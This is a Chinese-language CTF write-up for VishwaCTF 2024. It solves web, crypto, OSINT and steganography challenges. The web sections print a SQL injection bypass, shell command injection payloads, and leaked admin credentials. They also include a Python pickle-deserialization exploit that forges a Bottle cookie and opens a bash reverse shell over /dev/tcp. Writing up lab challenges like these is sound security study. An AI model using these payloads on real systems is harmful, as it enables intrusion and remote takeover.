VishwaCTF 2024 writeup

Team: CakeisTheFake(單人)
Rank: 31/1039
Author: Naup堇姬

Misc

Who am I?

image
image

Web

Save The City

1
2
3
4
5
6
7
DESCRIPTION
The RAW Has Got An Input That ISIS Has Planted a Bomb Somewhere In The Pune! Fortunetly, RAW Has Infiltratrated The Internet Activity of One Suspect And They Found This Link. You Have To Find The Location ASAP!

Aurthor : Samarth Ghante & Harshali Patil

FLAG FORMAT:
VishwaCTF{}

當我嘗試nc他時,他會回應SSH-2.0-libssh_0.8.1
以及會回應bye bye

image
image

我嘗試根據他給的去搜尋,發現了。
CVE-2018-10993 libSSH authentication bypass exploit

利用這資訊我找到了一份POC,RCE!!!
https://gist.github.com/mgeeky/a7271536b1d815acfb8060fd8b65bd5d

image
image

flag在 /location.txt

image
image

FLAG: flag:VishwaCTF{elrow-club-pune}

Trip To Us

進來你會看到一個頁面

image
image

例行的先用dirsearch來掃看看有沒有隱藏路徑

image
image

可以找到一些路徑

1
2
3
4
/backups/
/db/
/Dockerfile
/auth-iit-user.php

可以先去/db/

image
image

可以找到資料庫,裡面有admin的username和password(admin/unbre@k@BLE_24)

image
image

去到該路徑/auth-iit-user.php 可以找到login入口

image
image

They Are Coming

1
2
3
4
5
6
7
DESCRIPTION
Aesthetic Looking army of 128 Robots with AGI Capabilities are coming to destroy our locality!

Author : Samarth Ghante

FLAG FORMAT:
VishwaCTF{}

首先根據提示應該可以想到要去robots.txt,有Decryption key

image
image

L3NlY3JldC1sb2NhdGlvbg== 可以base64 -> /secret-location
去/secret-location可以找到local storage有東西

image
image

1
2
3
Cipher :  Gkul0oJKhNZ1E8nxwnMY8Ljn1KNEW9G9l+w243EQt0M4si+fhPQdxoaKkHVTGjmA
Decryption key: th1s_1s_n0t_t5e_f1a9
IV沒說先打個1(感覺是0但0不給我用)

CBC-128-hint

image
image

image
image

CBC解密
https://tool.lmeee.com/jiami/aes

image
image

第一個改掉就行

FLAG: VishwaCTF{g0_Su88m1t_1t_Qu14kl7}

MediCare Pharma

看到這個可以懷疑SQL injection

image
image

username=tst&password=tst' or 'a'='a'#可以炸出幾隻帳號

image
image

登入後可以看到一個頁面,然後可以找到他會leak source code

image
image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
header('Content-Type: application/json');

if ($_SERVER["REQUEST_METHOD"] == "POST") 
{
    $enteredInput = $_POST['search_param'];
    
    if (strlen($enteredInput) == 0)
    {
        echo json_encode(['result' => "Search bar cannot be empty"]);
    }

    else
    {
        $result = shell_exec($enteredInput);

        if ($result == null)
        {
            echo json_encode(['result' => ($enteredInput . " not found in store")]);
        }

        else
        {
            echo json_encode(['result' => $result]);
        }
    }

} 

else 
{
    http_response_code(404);
    echo json_encode(['error' => 'Access Forbidden']);
}
?>

可以很明顯看到這裡有command injection

1
shell_exec($enteredInput);

flag在家目錄

image
image

image
image

Payload

1
2
ls ~
cat ~/flag.txt

FLAG: VishwaCTF{d1g1t4l_p41n_di5p4tch3d_th4nk5_f0r_sh0pp1ng_with_M3diC4re_Ph4rm4}

Recipe Archival Workshop:

這題我也不知道為啥,直接上傳一個.jpg後,把它改成.tiff就可以拿到flag了
貌似跟fuzz extension name相關(?
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-large-extensions.txt

image
image

VishwaCTF{today_i_wanted_to_eat_a_croissant_QUASO}

H34D3RS

簡單觀察了一下,你可以發現他其實是個要你偽造header來bypass各種驗證的題目(跟之前pico某題很像)

直接附上payload跟過程

image
image

image
image

image
image

image
image

image
image

image
image

加入了

1
2
3
4
5
User-Agent: lorbrowser
Referer: https://vishwactf.com/
Date: 2024+20=2044
Upgrade-Insecure-Requests: 10
Downlink: 999999999

Downlink參考資料:
https://docs.w3cub.com/http/headers/downlink

Payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
GET / HTTP/2
Host: ch42785150716.ch.eng.run
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 10
Sec-Ch-Ua-Platform: "Windows"
User-Agent: lorbrowser
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://vishwactf.com/
Date: 2044
Downlink: 999999999
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=0, i

FLAG: VishwaCTF{s3cret_sit3_http_head3rs_r_c0o1}

Prompt Injection(本場最難也最有趣的web)

一開始進到該頁面可以快速找到一個LFI

image
image

可以嘗試去讀source code

1
/show?id=../../../app/app.py

source code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
from bottle import route, run, template, request, response, error
from config.secret import Vishwa
import os
import re


@route("/")
def home():
    return template("index")


@route("/show")
def index():
    response.content_type = "text/plain; charset=UTF-8"
    param = request.query.id
    if re.search("^../app", param):
        return "No!!!!"
    requested_path = os.path.join(os.getcwd() + "/poems", param)
    try:
        with open(requested_path) as f:
            tfile = f.read()
    except Exception as e:
        return "No This Poems"
    return tfile


@error(404)
def error404(error):
    return template("error")


@route("/sign")
def index():
    try:
        session = request.get_cookie("name", secret=Vishwa)
        if not session or session["name"] == "guest":
            session = {"name": "guest"}
            response.set_cookie("name", session, secret=Vishwa)
            return template("guest", name=session["name"])
        if session["name"] == "admin":
            return template("admin", name=session["name"])
    except:
        return "pls no hax"


if __name__ == "__main__":
    os.chdir(os.path.dirname(__file__))
    run(host="0.0.0.0", port=80)

是個用bottle寫的後端
另外看到了

1
from config.secret import Vishwa

可知道他把cookie金鑰存在哪裡,用LFI去把他找出來,可以用來偽造cookie

image
image

Cookie Key

1
Vishwa = "trrrrrrrrrrrrryyyyyyyyyyyharddddddddd"

原本我嘗試去偽造admin cookie但只顯示了這個

image
image

後來我去看了一下這個頁面,真的甚麼都沒有,這樣的話,感覺要RCE才能夠找到flag

image
image

先後嘗試了SSTI但都沒成果
後來看了一陣子
我先去看了get_cookie()的底層,他去調用了cookie_decode()
嘗試去找了cookie_decode()的底層,發現有pickle可以用來RCE!!!

1
2
3
4
5
6
7
8
def cookie_decode(data, key):
    ''' Verify and decode an encoded string. Return an object or None.'''
    data = tob(data)
    if cookie_is_encoded(data):
        sig, msg = data.split(tob('?'), 1)
        if _lscmp(sig[1:], base64.b64encode(hmac.new(tob(key), msg, digestmod=hashlib.md5).digest())):
            return pickle.loads(base64.b64decode(msg))
    return None

透過偽造cookie的方式,在cookie列中塞入payload來達成反序列化的RCE
使用pickle來RCE可以使用__reduce__(傳回一個元組,第一個值是一個函數,第二個值是傳遞給函數的參數)
pickle.loads被呼叫時,它將使用參數來呼叫該函數

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import hashlib
import os
import pickle
import base64
import hmac

Vishwa = "trrrrrrrrrrrrryyyyyyyyyyyharddddddddd"
remote_ip = ""   #填入ip
def tob(s, enc='utf8'):
    return s.encode(enc) if isinstance(s, str) else bytes(s)

class A(object):
    def __reduce__(self):
        s = f"bash -c 'bash -i >& /dev/tcp/{remote_ip}/9999 0>&1'"             
        return (os.system, (s,))

a = A()
s = pickle.dumps(a)
msg = base64.b64encode(s)
sig = base64.b64encode(hmac.new(tob(Vishwa), msg, digestmod=hashlib.md5).digest())

payload = tob('!') + sig + tob('?') + msg
print(payload)
pickle.loads(s)

將payload修改到cookie裡面,就可以彈回reverse shell到port 9999

image
image

原本以為要提權但發現他可以執行,執行就可以拿到flag了

image
image

簡單來說,他需要你從 LFI -> 底層 -> pickle -> 偽造cookie -> RCE -> reverse shell -> Get flag

相當有趣的一題

FLAG: VishwaCTF{W3lcome_t0_p03m_p0ck3t}

Crypto

Happy Valentine’s Day

他把自己圖片的前8位跟自己做了xor,所以該圖片前8位都變成了0,

image
image

source code

1
2
3
4
5
6
7
8
9
10
11
12
from PIL import Image
from itertools import cycle

def xor(a, b):
    return [i^j for i, j in zip(a, cycle(b))]

f = open("original.png", "rb").read()
key = [f[0], f[1], f[2], f[3], f[4], f[5], f[6], f[7]]

enc = bytearray(xor(f,key))

open('enc.txt', 'wb').write(enc)

我只要能找出key,在做一次xor就可以還原圖片,我嘗試去研究了.jpg的特性。發現了:

  • png檔案固定開頭[0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A]

Script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from PIL import Image
from itertools import cycle

def xor(a, b):
    return bytes(i^j for i, j in zip(a, cycle(b)))

enc_data = open('enc.txt', 'rb').read()
#0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A -> png
#137, 80, 78, 71, 13, 10, 26, 10 -> jpg
key = [0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A]

decrypted_data = xor(enc_data, key)

open('decrypted_image.png', 'wb').write(decrypted_data)

image
image

FLAG: VishwaCTF{h3ad3r5_f0r_w1nn3r5}

Teyvat Tales

要解密的

image
image

可以找到他的js

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
const submitBtn1 = document.getElementById("submit-btn-1");
const firstFour = document.querySelector(".first-four");

const submitBtn2 = document.getElementById("submit-btn-2");
const secFour = document.querySelector(".sec-four");

const submitBtn3 = document.getElementById("submit-btn-3");
const thirdFour = document.querySelector(".third-four");

const submitBtn4 = document.getElementById("submit-btn-4");
const fourthFour = document.querySelector(".fourth-four");


submitBtn1.addEventListener("click", ()=> {
    const inputText1 = document.getElementById("input1").value.trim();

    if (inputText1.toLowerCase() === "enigma m3") {
        firstFour.classList.remove("centered-align");
        firstFour.classList.add("hidden");
    }
    else{
        alert("Incorrect deciphering! Try again!")
    }
});

submitBtn2.addEventListener("click", ()=> {
    const inputText2 = document.getElementById("input2").value.trim();

    if (inputText2.toLowerCase() === "ukw c") {
        secFour.classList.remove("centered-align");
        secFour.classList.add("hidden");
    }
    else{
        alert("Incorrect deciphering! Try again!")
    }
});

submitBtn3.addEventListener("click", ()=> {
    const inputText3 = document.getElementById("input3").value.trim();

    if (inputText3.toLowerCase() === "rotor1 i p m rotor2 iv a o rotor3 vi i n") {
        thirdFour.classList.remove("centered-align");
        thirdFour.classList.add("hidden");
    }
    else{
        alert("Incorrect deciphering! Try again!")
    }
});

submitBtn4.addEventListener("click", ()=> {
    const inputText4 = document.getElementById("input4").value.trim();

    if (inputText4.toLowerCase() === "vi sh wa ct fx") {
        fourthFour.classList.remove("centered-align");
        fourthFour.classList.add("hidden");        
    }
    else{
        alert("Incorrect deciphering! Try again!")
    }
});

看起來很像Enigma machine
直接將他給的丟進去
https://cryptii.com/

image
image

FLAG: VishwaCTF{beware_of_tone-deaf_bard}

Poly Fun

題目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
import numpy as np
import random

polyc = [4,3,7]
poly = np.poly1d(polyc)


def generate_random_number():
    while True:
        num = random.randint(100, 999)
        first_digit = num // 100
        last_digit = num % 10
        if abs(first_digit - last_digit) > 1:
            return num


def generate_random_number_again():
    while True:
        num = random.randint(1000, 9999)
        if num % 1111 != 0:
            return num


def transform(num):
    number = random.randint(1, 100000)
    org = number
    number *= 2
    number += 15
    number *= 3
    number += 33
    number /= 6
    number -= org
    if number == 13:
        num1 = random.randint(1, 6)
        num2 = random.randint(1, 6)
        number = num1 * 2
        number += 5
        number *= 5
        number += num2
        number -= 25
        if int(number / 10) == num1 and number % 10 == num2:
            number = generate_random_number()
            num1 = int(''.join(sorted(str(number), reverse=True)))
            num2 = int(''.join(sorted(str(number))))
            diff = abs(num1 - num2)
            rev_diff = int(str(diff)[::-1])
            number = diff + rev_diff
            if number == 1088:
                org = num
                num *= 2
                num /= 3
                num += 5
                num *= 4
                num -= 9
                num -= org
                return num
            else:
                number = generate_random_number_again()
                i = 0
                while number != 6174:
                    digits = [int(d) for d in str(number)]
                    digits.sort()
                    smallest = int(''.join(map(str, digits)))
                    digits.reverse()
                    largest = int(''.join(map(str, digits)))
                    number = largest - smallest
                    i += 1

                if i <= 7:
                    org = num
                    num *= 2
                    num += 7
                    num += 5
                    num -= 12
                    num -= org
                    num += 4
                    num *= 2
                    num -= 8
                    num -= org
                    return num
                else:
                    org = num
                    num **= 4
                    num /= 9
                    num += 55
                    num *= 6
                    num += 5
                    num -= 23
                    num -= org
                    return num
        else:
            org = num
            num *= 10
            num += 12
            num **= 3
            num -= 6
            num += 5
            num -= org
            return num
    else:
        org = num
        num += 5
        num -= 10
        num *= 2
        num += 12
        num -= 20
        num -= org
        return num


def encrypt(p,key):
    return ''.join(chr(p(transform(i))) for i in key)


key = open('key.txt', 'rb').read()
enc = encrypt(poly,key)
print(enc)

題目也有給我key跟enc

1
2
key_enc: ☞➭⥄⫣Ⲋ⸹⿰ㆯ㍶☞⒗☞☞☞➭☞⥄☞⫣☞Ⲋ☞⸹☞⿰☞ㆯ☞㍶➭⒗➭
flag_enc: u5FUKxDUxH9y8yxvfaaU+GSXDwvJS6QxlN/3udOEzpU6fIVUExjDLsB3LKqUTz/x

先分析那陀又臭又長的transform(num)
然後你就可以直接知道他只是在唬爛你
實際上

1
transform(num)=num

所以可以把題目化簡成這樣

1
2
3
4
5
6
7
8
9
10
11
12
import numpy as np
import random

polyc = [4,3,7]
poly = np.poly1d(polyc)

def encrypt(p,key):
    return ''.join(chr(p(i)) for i in key)

key = open('key.txt', 'rb').read()
enc = encrypt(poly,key)
print(enc)

再來可以想到,他會把key的每一位丟進polyc來算出一個奇怪的東西,所以我就想到我可以建個表,把ASCII的字丟進去算出對應的。之後再把key_enc根據表對應出來來還原key

Script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from itertools import product
from itsdangerous import base64_decode, base64_encode
from tqdm import tqdm
import numpy as np
import random

polyc = [4,3,7]
poly = np.poly1d(polyc)
def encrypt(p,key):
    # 
    return ''.join(chr(p(i)) for i in key)

dic={}
for new_key in tqdm(product(range(256))):
    key=bytes(new_key)
    enc = encrypt(poly,key)
    dic[enc] = key
    
example_enc = "☞➭⥄⫣Ⲋ⸹⿰ㆯ㍶☞⒗☞☞☞➭☞⥄☞⫣☞Ⲋ☞⸹☞⿰☞ㆯ☞㍶➭⒗➭"
p=b''
for i in example_enc:
    p+=dic[i]
print(p)

image
image

1
key:b'12345678910111213141516171819202'

image
image

最後直接解密就好了

FLAG: VishwaCTF{s33_1_t0ld_y0u_1t_w45_345y}

Intellectual Heir

題目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# my secret to hide the combination of my safe in fornt of all without anyone getting a clue what it is ;)

#some boring python function for conversion nothing new
def str_to_ass(input_string):
    ass_values = []
    for char in input_string:
        ass_values.append(str(ord(char)))
    ass_str = ''.join(ass_values)
    return ass_str

input_string = input("Enter the Combination: ")
result = str_to_ass(input_string)
msg = int(result)

#not that easy, you figure out yourself what the freck is a & z
a =
z =

f = (? * ?) #cant remember what goes in the question mark
e = #what is usually used

#ohh yaa!! now you cant figure out $h!t
encrypted = pow(msg, e, f)
print(str(encrypted))

#bamm!! protection for primes
number =
bin = bin(number)[2:]

#bamm!! bamm!! double protection for primes
bin_arr = np.array(list(bin), dtype=int)
result = np.sin(bin_arr)
result = np.cos(bin_arr)
np.savetxt("file1", result)
np.savetxt("file2", result)

只是把p,q經過三角函數後寫入檔案,把他轉回來就可以解密了,另外這邊猜測e=65537

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
def ass_to_str(input_string):
    result = ''
    for i in range(0, len(input_string), 2):
        code_point = int(input_string[i:i+2])

        result += chr(code_point)
    return result

#cos
#cos(1)=0.5...
#cos(0)=1
first=""
with open('file1.txt', 'r') as file:
    for line in file:
        if int(line[0]) == 1:
            first=''.join([first,"0"])
        else:
            first=''.join([first,"1"])

#sin
#sin(1)=0.8
#sin(0)=0
print()
second=""
with open('file2.txt', 'r') as file:
    for line in file:
        if int(line[0]) == 0:
            second=''.join([second,"0"])
        else:
            second=''.join([second,"1"])
# sol RSA
p=int(first, base=2)
q=int(second,base=2)

n=p*q
enc=4400037514278889258479265625258024039636437755883377709505596356049534358755375772484057042989024750972247184288820831886430459963472328358741858934783775986591400972020736548834642094922678189447202173710409868474198821576627330424767999152339702779346380
e=65537
d= pow(e,-1,(p-1)*(q-1))

m=pow(enc,d,n)
print(m)
print(ass_to_str(str(m)))

Flag: VishwaCTF{Y0U_@R3_T#3_W0RT#Y_OF_3}

OSINT

The end is beginning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
DESCRIPTION
Me and my friends just finished our final semester of B.Tech, so we decided to have a trip somewhere, but due to some reason, many of them were not available for the trip, but we were all ok as less is more. As the trip was about to end, one of my friends said we should try scuba diving here. I was scared of that, but my friends said, If you don't risk anything, you risk everything. Seriously, why do we have to risk our lives for half an hour? It's impossible for me, I said. But they motivated me all night, and then it was time for the dive. I screamed, Impossible is not a word in my vocabulary, and dived in. After all this, when I came back to my room, I realised I was low on money, so I called and asked my father for some help by singing something like this:

I’d be gone to my dad
And ask for some cash
I ran ......

All the Hustle towards the trip was worth it, as we enjoyed it a lot and made some awesome memories throughout the trip.

Flag format: VishwaCTF{My Name according to story_Amount I got in figures}

Author : Abhinav

FLAG FORMAT:
VishwaCTF{}

根據他給的歌詞我找到了
https://www.youtube.com/watch?v=ybRYNRcIuA4

FLAG: VishwaCTF{Paradox_5000}

TRY HACK ME

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
DESCRIPTION
TryHackMe is a browser-based cyber security training platform, with learning content covering all skill levels from the complete beginner to the seasoned hacker.

One of our team member is very active on the platform. Recently, I got to know that he comes under 3% in the global leaderboard. Impressive isn't it.

Maybe you should have a look at his profile

PS : He keeps his digital identity very simple. No fancy usernames. It's just a simple mathematics

His real name == His username

Author : Amruta Patil

FLAG FORMAT:
VishwaCTF{}

要找一個他的成員是tryhackme 前3%的人所以我就先去他們官網看他們的成員
https://vishwactf.com/team/team.html
找到了一個人,有tryhackme的相關文章
https://www.linkedin.com/in/ankushkaudi/?originalSubdomain=in

順著去找tryhackme,就可以找到該帳號
https://tryhackme.com/p/ankushkaudi

image
image

FLAG: VishwaCTF{Pr0f1l3_1dent1fi3d_v0uch3r5_cr3d1t3d_5ucc355fully}

ifconfig_inet

1
2
3
4
5
6
7
8
9
10
11
12
DESCRIPTION
In the labyrinth of binary shadows, Elliot finds himself standing at the crossroads of justice and chaos. Mr. Robot, the enigmatic leader of the clandestine hacktivist group, has just unleashed a digital storm upon Evil Corp's fortress. The chaos is palpable, but this is just the beginning.

As the digital tempest rages, Elliot receives a cryptic message from Mr. Robot. "To bring down Evil Corp, we must cast the shadows of guilt upon Terry Colby," the message echoes in the encrypted channels. However, in the haze of hacktivism, Elliot loses the crucial IP address and the elusive name of the DAT file, leaving him in a digital conundrum.

To navigate this cybernetic maze, Elliot must embark on a quest through the binary underbelly of Evil Corp's servers. The servers, guarded by firewalls and encrypted gatekeepers, conceal the secrets needed to ensure Terry Colby's fall.

Guide Elliot to the his destiny.

Flag Format : VishwaCTF{name of DAT file with extension_IP address of Terry Colby}

E.g : VishwaCTF{file.dat_0.0.0.0}

keyword:Terry Colby
https://www.reddit.com/r/MrRobot/comments/ehhs2c/im_sure_many_of_you_noticed_terry_colbys_ip/
https://github.com/GabrielCrackPro/mr-robot-api

FLAG: VishwaCTF{fsociety00.dat_218.108.149.373}

Sagar Sangram

他給你了一個bot,問妳很多印度教問題,直接用gemini,他會給你總共十一題的答案

  • gemini
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    Q1 of 10 : So it was decided, to obtain the divine potion of immortality, churning of the ocean is to be performed. For that purpose a huge mountain was used. Tell me what is the name of the mountain and also which ocean was churned to obtain the potion of immortality?
    Ans fromat : name of ocean without space_name of mountain
    kshirasagara_mandara
    Q2 of 10 :Let's get step back. Mount Mandara was used in churning. But it was not just around the ocean. It was brought there by someone. So, who brought Mount Mandara to Kshirasagara?
    Garuda
    Q3 of 10 : Now the stage is set but to churn the ocean, something was required which both the groups would hold and churn. Who was used like a rope to churn the ocean Kshirasagara?
    Vasuki
    Q4 of 10 : The process starts and the outcomes begin to appear. One such outcome was a very threatening substance, which had the power to destroy the whole universe. But 'The Ultimate Destroyer' comes to rescue and consumed it, which results in his throat turning blue hence he is also called 'Neelakantha'. What is the substance called?
    Halahala
    Q5 of 10 : Let's talk about few more outcomes. One such divine outcome was a tree. It was taken to the abode of Indra in swarga. It is often referred to as 'Wish Fulfilling Tree' as it  possess the power to bring one's imagination into reality. Tell me the name of this tree?
    Kalpavrikshaa
    Q6 of 10 : Another creature appeared was a very powerful elephant which was taken by Lord Indra as his medium of transportation. It was very powerful elephant and also referred sometimes as 'King of Elephants'. What is the name of that elephant?
    Airavata
    Q7 of 10 : After a while during the process, a bow appeared during the churning. It was given to Lord Vishnu as a weapon. What is the name of that divine bow?
    Sharanga
    Q8 of 10 : In ancient times as mentioned in the scriptures, conch was used as a sign to initiate a war between two groups (also used for other purposes as well). Different persons from both the sides would blow the conch which will mark the start of the war. During the churning, one such conch was obtained and it was given to Lord Vishnu. It's sound symbolizes the 'Sound of Creation'. What is the name of the conch?
    Panchajanya
    Q9 of 10 : The fortunes turned as the goddess of fortune herself appeared. Every wanted the goddess of fortune to be at their side, but the destiny has it's own plan. She chose Lord Vishnu as her eternal consort.. Who is the goddess of fortune?
    Lakshmi
    Q10 of 10 : Ok, let's end this thing. After all the struggle from both the sides, the long wait comes to an end. The divine potion is here and it is brought by none other than the physician of the devas. He is also referred to as 'God of Ayurveda'. Tell me his name and also the name of divine potion?
    Ans format : name of the physicianname of divine potion
    Dhanvantari_Amrita
    Impressive. A perfect 10/10. You are one the who deserves the flag. Just one last thing. All the event which is I asked you about is very popular and is mentioned in various scriptures like Vishnu Purana, Mahabharata, etc. Can you tell me what this event is popularly known as?
    Use  in place of any space
    Samudra_Manthana
    Perfect. That's all about this challenge. Hope you enjoyed it.
    Thank you for playing VishwaCTF'24. Here you go with the flag for the challenge 'Sagar Sangram'
    VishwaCTF{karmany-evadhikaras te ma phaleshu kadachana ma karma-phala-hetur bhur ma te sango stvakarmani}

Flag: VishwaCTF{karmany-evadhikaras te ma phaleshu kadachana ma karma-phala-hetur bhur ma te sango stvakarmani}

Steganography

Secret Code

binwalk 來解出兩份檔案.
helper.txt5ecr3t_c0de.zip
然後發現.zip需要密碼所以炸看看他

image
image

1
2
3
crunch 6 6 0123456789 -o pass.txt
zip2john 5ecr3t_c0de.zip > hash.txt
john --wordlist=pass.txt hash.txt

找到後解壓縮出 5ecr3t_c0de.txtinfo.txt

image
image

看起來是一群座標點,把他點出來

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from PIL import Image, ImageDraw

with open("5ecr3t_c0de.txt", "r") as f:
    lines = f.readlines()
    coordinates = [tuple(map(int, line.strip("()\n").split(", "))) for line in lines]

def generate_image(coordinates):
    max_x = max(coord[0] for coord in coordinates)
    max_y = max(coord[1] for coord in coordinates)
    new_image = Image.new("RGB", (max_x + 1, max_y + 1), color="white")

    draw = ImageDraw.Draw(new_image)
    for coord in coordinates:
        draw.point(coord, fill="black")

    return new_image

new_image = generate_image(coordinates)
new_image.show()

image
image

We Are Valorant

給了你一張圖片跟影片
先修復圖片成.jpg | JPEG | ff d8 ff |
接下來看影片逐偵找會找到金鑰

1
key:Tenz

下steghide解出來

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
naup96321@DESKTOP-T2ED0OK:~/vish$ steghide info g.jpg
"g.jpg":
  format: jpeg
  capacity: 185.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
  embedded file "not_a_secret.txt":
    size: 114.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes
naup96321@DESKTOP-T2ED0OK:~/vish$ ls
 g.jpg   k.txt   m.py   main.py   r.py  'we_are_valorant (1).jpg:Zone.Identifier'
naup96321@DESKTOP-T2ED0OK:~/vish$ steghide extract -sf g.jpg -xf not_a_secret.txt -p Tenz
wrote extracted data to "not_a_secret.txt".
naup96321@DESKTOP-T2ED0OK:~/vish$ ls
 g.jpg   k.txt   m.py   main.py   not_a_secret.txt   r.py  'we_are_valorant (1).jpg:Zone.Identifier'
naup96321@DESKTOP-T2ED0OK:~/vish$ cat not_a_secret.txt
Hello!!
hope you are enjoying the CTF
here's your flag


VishwaCTF{you_are_invited_to_the_biggest_valorant_event}

Flag: VishwaCTF{you_are_invited_to_the_biggest_valorant_event}